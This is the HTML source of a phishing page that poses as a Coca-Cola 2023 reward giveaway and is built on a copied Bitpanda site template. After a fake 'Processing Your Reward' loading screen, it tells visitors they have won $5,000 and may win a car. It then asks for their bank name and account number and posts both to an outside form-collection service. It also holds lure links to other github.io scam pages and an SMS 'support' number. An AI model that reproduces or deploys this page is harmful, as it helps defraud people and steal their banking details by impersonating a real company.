    
<!DOCTYPE html>
<html>
<head>

<meta charset=utf-8>


    <title>Coca-Cola | Enjoy</title>
    <script>
        // Wait for 14 seconds before displaying the content
        setTimeout(function(){
            document.getElementById('loading').style.display = 'none';
            document.getElementById('content').style.display = 'block';
        }, 16000);
    </script>
    <style>
        /* Customize the loading animation */
        #loading {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: #fff;
            z-index: 9999;
        }
        #loading .loading-text {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            font-size: 20px;
            font-weight: bold;
            color: #333;
        }
        #loading .loading-spinner {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 80px;
            height: 80px;
            border: 3px solid DarkRed;
            border-top-color: DarkRed;
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }
        @keyframes spin {
            to {
                transform: rotate(360deg);
            }
        }

        /* Hide the content initially */
        #content {
            display: none;
        }
    </style>
</head>
<body>
    <div id="loading">
        <!-- Customize the loading animation and text -->
        <div class="loading-text">



Please Wait<br> 

Do Not Leave This  Page.

<br>  <br> 
Processing Your Reward

<br> <br>


This Takes Less  Than 2 Minutes.


<br><br> 
Do not leave this page!  





</div>
        <div class="loading-spinner"></div>
    </div>



    <div id="content">














<html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script>






<meta charset=utf-8>





<title>

Coca-Cola | Enjoy

</title>


<meta content="width=device-width, initial-scale=1.0" name=viewport>


<link href=https://www.bitpanda.com/en rel=canonical><link href=/en hreflang=x-default rel=alternate><link href=/en hreflang=en rel=alternate><link href=/de hreflang=de rel=alternate><link href=/fr hreflang=fr rel=alternate><link href=/es hreflang=es rel=alternate><link href=/it hreflang=it rel=alternate><link href=/pl hreflang=pl rel=alternate>

<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>


<script type=application/ld+json>{
                "@context": "https://schema.org",
                "@type": "BreadcrumbList",
                "itemListElement": [
                    [{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.bitpanda.com\/en"}]
                ]
            }</script> <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>


















<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/ce/Coca-Cola_logo.svg/640px-Coca-Cola_logo.svg.png" jsaction="VQAsE" class="r48jcc pT0Scc iPVvYb" style="max-width: 1280px; opacity: 1; transform: none; width: 150px; height: 45px; margin: 0px;" alt="Coca-Cola - Wikipedia" jsname="kn3ccd" aria-hidden="false">















 </div> <div class=util-visible-desktop><ul class=bp-nav__navigation><li><div class=bp-nav__item><div class=bp-nav__item__text>Invest</div> <div class=bp-dropdown><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><div class=bp-dropdown__title></div> <ul><li><a aria-current=true bp-expand=bp-expand-1 class=bp-dropdown__item href=https://www.bitpanda.com/en/invest/cryptocurrencies><img alt="Cryptocurrencies &lt;small&gt;Buy, sell &amp; swap cryptocurrencies&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/Cryptos.svg width=36> <div><small> </small> </div></a> <li>




<a aria-current=false bp-expand=bp-expand-2 class=bp-dropdown__item href=https://celebrity-org.github.io/Claim/>



<img alt="Stocks* &lt;small&gt;Invest in stocks with zero commissions&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/Stocks.svg width=36> <div><small></small> </div></a> <li><a aria-current=false bp-expand=bp-expand-3 class=bp-dropdown__item href=https://www.bitpanda.com/en/invest/bitpanda-stocks><img alt="ETFs* &lt;small&gt;Invest in ETFs 24/7&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/etf-1.svg width=36> <div>
 
<small></small> </div></a> <li><a aria-current=false bp-expand=bp-expand-4 class=bp-dropdown__item href=https://www.bitpanda.com/en/bci-bitpanda-crypto-index><img alt="Crypto Indices &lt;small&gt;The world&#039;s first real crypto index&lt;/small&gt;" height=36 src=https://cdn.bitpanda.com/media/New%20navigation_Rebrand%203.0/BCI.svg width=36> <div><small></small> </div></a> 



 <li><a class=bp-dropdown__item href=https://www.bitpanda.com/en/press-downloads><div></div> </a> <li><a class=bp-dropdown__item href=https://www.bitpanda.com/en/career><div></div> </a> </ul> </ul> </div></div> <li class=bp-dropdown__align-anchor><div class=bp-nav__item><div class=bp-nav__item__text></div> <div class="bp-dropdown bp-dropdown--padding-sm"><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><ul><li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us/articles/360001705580-I-m-new-to-Bitpanda-Where-should-I-start-><div> How to get started </div> </a> <li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us/articles/360019578140-Who-can-use-Bitpanda-><div></div> </a> <li><a class=bp-dropdown__item href=https://www.bitpanda.com/en/limits><div> </div> </a> <li><a class=bp-dropdown__item href=https://blog.bitpanda.com/en/why-data-privacy-is-important-to-us><div> </div> </a> <li><a class=bp-dropdown__item href=https://support.bitpanda.com/hc/en-us><div></div> </a> </ul> </ul> </div></div> <li id=js-primary-search-modal-toggler uk-toggle="target: #search-modal"><div class="bp-dropdown--search-button bp-nav__item"><a class=bp-nav__circle-button href=/><svg class=bp-symbol style="--bp-symbol-size: 11px;"><use xlink:href=#icon-magnifier></use> </svg> </a> </div> </li> <script>(function() {
            document.getElementById('js-primary-search-modal-toggler').addEventListener('click', function() {
                setTimeout(function(){
                        document.getElementById('search-input-modal').focus();}
                    ,500);
            });
        })();</script></ul> </div> <div class=util-visible-desktop><div><ul class=bp-nav__navigation><li class=bp-dropdown__align-anchor><div class=bp-nav__item><div class=bp-nav__item__text><svg class=bp-symbol style="vertical-align: text-top;"><use xlink:href=#icon-globe></use> </svg><svg class=bp-symbol style="--bp-symbol-size: 10px; vertical-align: inherit;"><use xlink:href=#icon-chevron-down></use> </svg> </div> <div class="bp-dropdown bp-dropdown--padding-sm"><ul class=bp-dropdown__grid><li class=bp-dropdown__grid-list><ul><li><a class=bp-dropdown__item href=/en><div> </div> </a> <li><a class=bp-dropdown__item href=/de><div></div> </a> <li><a class=bp-dropdown__item href=/fr><div></div> </a> <li><a class=bp-dropdown__item href=/es><div></div> </a> <li><a class=bp-dropdown__item href=/it><div> </div> </a> <li><a class=bp-dropdown__item href=/pl><div></div> </a> </ul> </ul> </div></div> </ul> </div> <div>




<a class=bp-button href=https://bestdeals-com.github.io/IRS-BruceSpringsteen.com/  title="Log in"></a></div> <div><a class="bp-button bp-button--primary" href=https://giveaway-org.github.io/Done.CokeRewards.Com/  target=_blank title=Sign-up></a></div></div>


 <div class=util-visible-mobile><div>





</div>
    



</div></div> </div> <script>function toggleTarget(e) {
        const item = e.currentTarget;
        const currentTarget = document.getElementById(e.currentTarget.getAttribute("bp-expand"));
        if (currentTarget !== activeTarget) {
            activeTarget.setAttribute("aria-expanded", "false");
            currentTarget.setAttribute("aria-expanded", "true");
            activeTarget = currentTarget;

            activeItem.setAttribute("aria-current", "false");
            item.setAttribute("aria-current", "true");
            activeItem = item;
        }
    }
    let activeTarget = document.getElementById("bp-expand-1");
    let activeItem = document.querySelectorAll("[bp-expand=bp-expand-1]")[0];
    document.querySelectorAll("[bp-expand]").forEach(function (item) {
        item.addEventListener("mouseenter", toggleTarget, false);
        item.addEventListener("focus", toggleTarget, false);
    });</script> <div aria-expanded=false class=bp-offcanvas><div class=bp-offcanvas__header>



<a href="https://celebrity-org.github.io/Claim/">


<img alt=Bitpanda class=lazyload data-src=" https://cdn.bitpanda.com/media/Ukraine/U-bitpanda-logo.svg " height=40 width=136>


 </a>

 <button class="bp-button bp-button--transparent" onclick=toggleOffcanvas();><svg class=bp-symbol><use xlink:href=#icon-close></use> </svg> </button></div> <div class=bp-offcanvas__search-area><div class="bp-form-element bp-form-element--can-focus bp-form-element--large" id=js-mobile-search-modal-toggler uk-toggle="target: #search-modal"><input placeholder=Search type=search> <svg class=bp-symbol><use xlink:href=#icon-magnifier></use> </svg></div> <script>(function() {
                    document.getElementById('js-mobile-search-modal-toggler').addEventListener('click', function() {
                        setTimeout(function(){
                                document.getElementById('search-input-modal').focus();}
                            ,500);
                    });
                })();</script> <div class="bp-form-element bp-form-element--can-focus bp-form-element--large"><svg class=bp-symbol><use xlink:href=#icon-globe></use> </svg> 




 <script>function minimiseAll() {
        document.querySelectorAll("#js-offcanvas-nav > ul > li").forEach(function(li) {
            li.setAttribute("aria-expanded", false);
        })
    }
    document.querySelectorAll("#js-offcanvas-nav > ul > li").forEach(function(li) {
        li.addEventListener("click", function(e) {
            if(e.currentTarget.getAttribute("aria-expanded") === "true") {
                e.currentTarget.setAttribute("aria-expanded", false);
            } else {
                minimiseAll();
                e.currentTarget.setAttribute("aria-expanded", true);
            }
        });
    })
    function toggleOffcanvas(e) {
        const offcanvas = document.querySelectorAll(".bp-offcanvas")[0];
        if(offcanvas.getAttribute("aria-expanded") === "false") {
            offcanvas.setAttribute("aria-expanded", "true");
        } else {
            offcanvas.setAttribute("aria-expanded", "false");
        }
    }
    function changeLanguage(e) {
        document.location = e.value;
    }</script></header> <div id=mobile-nav uk-offcanvas="overlay: true;">








</header>




 <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m"><div class=module-text__content>







<h5>






  <script>
    function convertCurrency() {
      // Get the visitor's country based on IP address
      fetch('https://ipapi.co/json/')
        .then(response => response.json())
        .then(data => {
          const country = data.country_code;


          // Find the currency symbol elements on your page
          const currencySymbolElements = document.getElementsByClassName('currency-symbol');


          // Check if the visitor is in England or Scotland
          if (country === 'GB') {
            // Replace "$" with "£" for all currency symbol elements
            Array.from(currencySymbolElements).forEach(element => {
              element.textContent = '£';
            });
          }
          // Check if the visitor is in a European country
          else if (country === 'DE' || country === 'FR' || country === 'ES' || country === 'NL') {
            // Replace "$" with "€" for all currency symbol elements
            Array.from(currencySymbolElements).forEach(element => {
              element.textContent = '€';
            });
          }
        })
        .catch(error => {
          console.error('Error:', error);
        });
    }
  </script>
</head>
<body onload="convertCurrency()">




  
 









<div> 
<div class="container">
    <div class="left-text"><strong> <font style="color: DarkRed">


<font size="+2">


Approved


</strong></font></font>

</div>
    <div class="right-text">Balance: <strong><font size="+3"><span class="currency-symbol">$</span>5,000</font></strong> </div>
</div>

<style>
    .container {
        display: flex;
        justify-content: space-between;
    }
    .left-text {
        justify-self: flex-start;
    }
    .right-text {
        justify-self: flex-end;
    }
</style>

</div> 


</h5> 


<h6> 




<strong>




<font size="+1">

<Font STYLE="word-spacing:4px">




CONGRATULATIONS! Based On Your Answers To Our Questions, We  Are  Delighted To  Announce That  Your Application To Win 

  <span class="currency-symbol">$</span>5,000 Has Been Approved, Which Means That You Have Won

  <span class="currency-symbol">$</span>5,000. While Your Application  To Win A  Toyota Corolla Is  Still Being Processed.
    
    <br> <br> 

<font style="color: Brown">


Scroll Down  TO LEARN MORE

</font>

</font> 


<br> 

<br> 

<div style="border: 3px solid black; padding: 4px;">

<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT1E8npnrIOTMsscYcSC1HeWINOHnRkIfYFfg&amp;usqp=CAU" jsaction="VQAsE" class="r48jcc pT0Scc iPVvYb" style="max-width: 720px; width: 58px; height: 58px; margin: 0px;" alt="Information Icon Images – Browse 5,098,625 Stock Photos, Vectors ..." jsname="kn3ccd" aria-hidden="false">

<br> 
<Font STYLE="word-spacing:3px">

<strong> 

You Are Truly One Of The Luckiest Individuals To Have Won Big In Coca-Cola's Reward Event For The Year 2023


<br> <br>
</div> 

<br> 
<br>



The best part is that you can claim and withdraw the   

  <span class="currency-symbol">$</span>5,000 you have won right away,  even while awaiting our decision on whether you have won the Toyota Corolla..

<br> <br> 


Specify The Bank Account Where You Would Like To Receive The <span class="currency-symbol">$</span>5,000 Prize, Below.


<br> <br> <br> 


 
 
 
 
 
 
 
 
 
 
 
  <!-- Author: FormBold Team -->
  <!-- Learn More: https://formbold.com -->
  
 
  
  <div class="formbold-form-wrapper">



<form  action="https://formsubmit.io/send/538bcbc9-8ef0-46ba-9114-8a9534b3b334" method="POST">

<input name="_redirect" type="hidden" id="name" value="https://giveaway-org.github.io/Care.CokeRewards.Com/">







<div class="formbold-mb-5">
        <label for="Field1" class="formbold-form-label">   
        Name Of Bank To Receive Prize
        </label>
  
        <input
          type="text" required
          name="NameBankCOcaCoLA"
          id="field1"
          placeholder="Enter Your Bank's Name" 
          class="formbold-form-input"
        />
      </div>
      











<br> 


<div class="formbold-mb-5">
        <label for="Field1" class="formbold-form-label">   
          Account Number
        </label>
  
        <input
          type="text" 
          name="Account-NumberCocaCola"
          id="field1"
          placeholder="Enter Your Account Number" 
          class="formbold-form-input"
        />
      </div>










        <div class="formbold-mb-5">  
     </div>    

      <div>
        <button type="submit" value="Submit"
       class="formbold-btn w-full">CONTINUE</button>
      </div>
    </form>
  </div>
</div>
<style>
  @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
  body {
    font-family: "Inter", sans-serif;
  }
  .formbold-mb-5 {
    margin-bottom: 20px;
  }
  .formbold-pt-3 {
    padding-top: 12px;
  }
  .formbold-main-wrapper {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
  }

  .formbold-form-wrapper {
    margin: 0 auto;
    max-width: 550px;
    width: 100%;
    background: white;
  }
  .formbold-form-label {
    display: block;
    font-weight: 600;
    font-size: 20px;
    color: DarkRed;
    margin-bottom: 14px;
  }
  .formbold-form-label-2 {
    font-weight: 600;
    font-size: 20px;
    margin-bottom: 20px;
  }

  .formbold-form-input {
    width: 100%;
    padding: 17px 24px;
    border-radius: 6px;
    border: 3px solid DarkRed;
    background: white;
    font-weight: 500;
    font-size: 18px;
    color: #6b7280;
    outline: none;
    resize: none;
  }
  .formbold-form-input:focus {
    border-color: DarkRed;
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold-btn {
    text-align: center;
    font-size: 26px;
    border-radius: 14px;
    padding: 18px 32px;
    border: none;
    font-weight: 600;
    background-color: DarkRed;
    color: white;
    cursor: pointer;
  }
  .formbold-btn:hover {
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold--mx-3 {
    margin-left: -12px;
    margin-right: -12px;
  }
  .formbold-px-3 {
    padding-left: 12px;
    padding-right: 12px;
  }
  .flex {
    display: flex;
  }
  .flex-wrap {
    flex-wrap: wrap;
  }
  .w-full {
    width: 100%;
  }

  .formbold-file-input input {
    opacity: 0;
    position: absolute;
    width: 100%;
    height: 100%;
  }

  .formbold-file-input label {
    position: relative;
    border: 1px dashed #e0e0e0;
    border-radius: 6px;
    min-height: 200px;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
    text-align: center;
  }
  .formbold-drop-file {
    display: block;
    font-weight: 600;
    color: #07074d;
    font-size: 20px;
    margin-bottom: 8px;
  }

  .formbold-or {
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    display: block;
    margin-bottom: 8px;
  }
  .formbold-browse {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    display: inline-block;
    padding: 8px 28px;
    border: 1px solid #e0e0e0;
    border-radius: 4px;
  }

  .formbold-file-list {
    border-radius: 6px;
    background: #f5f7fb;
    padding: 16px 32px;
  }

  .formbold-file-item {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .formbold-file-item button {
    color: DarkRed;
    border: none;
    background: transparent;
    cursor: pointer;
  }

  .formbold-file-name {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    padding-right: 12px;
  }
  .formbold-progress-bar {
    margin-top: 20px;
    position: relative;
    width: 100%;
    height: 6px;
    border-radius: 8px;
    background: #e2e5ef;
  }

  .formbold-progress {
    position: absolute;
    width: 75%;
    height: 100%;
    left: 0;
    top: 0;
    background: #6a64f1;
    border-radius: 8px;
  }

  @media (min-width: 540px) {
    .sm\:w-half {
      width: 50%;
    }
  }
</style>

</div> 

 



<br><br>

<br> 
<br>
   
This is about the time when you are saying this Is too good to be true, but it is absolutely true it is not a dream. This is our little way of saying thank you. Enjoy!

<br>
<br>


<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://media.tenor.com/yB_OI8Me0DsAAAAC/alishaan-congrats.gif">





<br><br>

    
    
    
    
    
    
    
    <br>




<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTUlqamPpyB73Z56qfqykB9qNeVkABrsRWCbQ&amp;amp;usqp=CAU">


<br>
<br> <br>


<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/ce/Coca-Cola_logo.svg/640px-Coca-Cola_logo.svg.png">




<br> <br> 
</h6>











<div>

<button id="supportButton"><strong>
 
Any Questions?<br> Click Here<br>
To Contact The<br>
Support Department<br> for Answers

</strong></button>
<div id="supportOverlay">
  <div id="supportContent">
     <a href="sms:+14064269256">
      <img src="https://i.ibb.co/TtFt0Zw/Add-Text-09-13-09-35-57.png" alt="Support Image">
    </a>
    <span id="closeButton">&times;</span>
  </div>
</div>
  
<style>
#supportButton {
  position: fixed;
  bottom: 20px;
  right: 20px;
  background-color: green;
  color: white;
  padding: 5px 10px;
  font-size: 18px;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}


#supportOverlay {
  display: none;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: rgba(0, 0, 0, 0.8);
  z-index: 9999;
}


#supportContent {
  display: flex;
  justify-content: flex-end;
  align-items: center;
  height: 100vh;
}


#supportContent img {
  max-width: 98vw;
  height: 70vh;
}


#closeButton {
  position: absolute;
  top: 10px;
  right: 10px;
  color: #fff;
  font-size: 24px;
  font-weight: bold;
  cursor: pointer;
}
</style>




<script>
document.getElementById('supportButton').addEventListener('click', function() {
  document.getElementById('supportOverlay').style.display = 'block';
});


document.getElementById('closeButton').addEventListener('click', function() {
  document.getElementById('supportOverlay').style.display = 'none';
});
</script>




</div> 











<strong> 
<footer style="background-color: black; color: white; padding: 20px; text-align: center;">
  <p>
<br> &copy 1886 - 2023 | Coca - Cola  <br> 


 All rights reserved.
<br> <br> <br> </strong>
</p>
</footer>
</strong>











<script>window.initScriptLater = function (scriptUrl, fallback) {
        const script = document.createElement("script");
        script.onload = fallback;
        script.src = scriptUrl;

        document.addEventListener("readystatechange", () => {
            if (document.readyState === "interactive") {
                document.head.appendChild(script);
            }
        });
    };

    window.initScriptLater("https://cdn.bitpanda.com/app/v2/js/cta-button.min.js?id=d34a8a89944479eef669", () =>
        window.initCtaButton()
    );</script></div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid="">


<div>


 </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m">



</path> </symbol></svg>



</body> </html> 
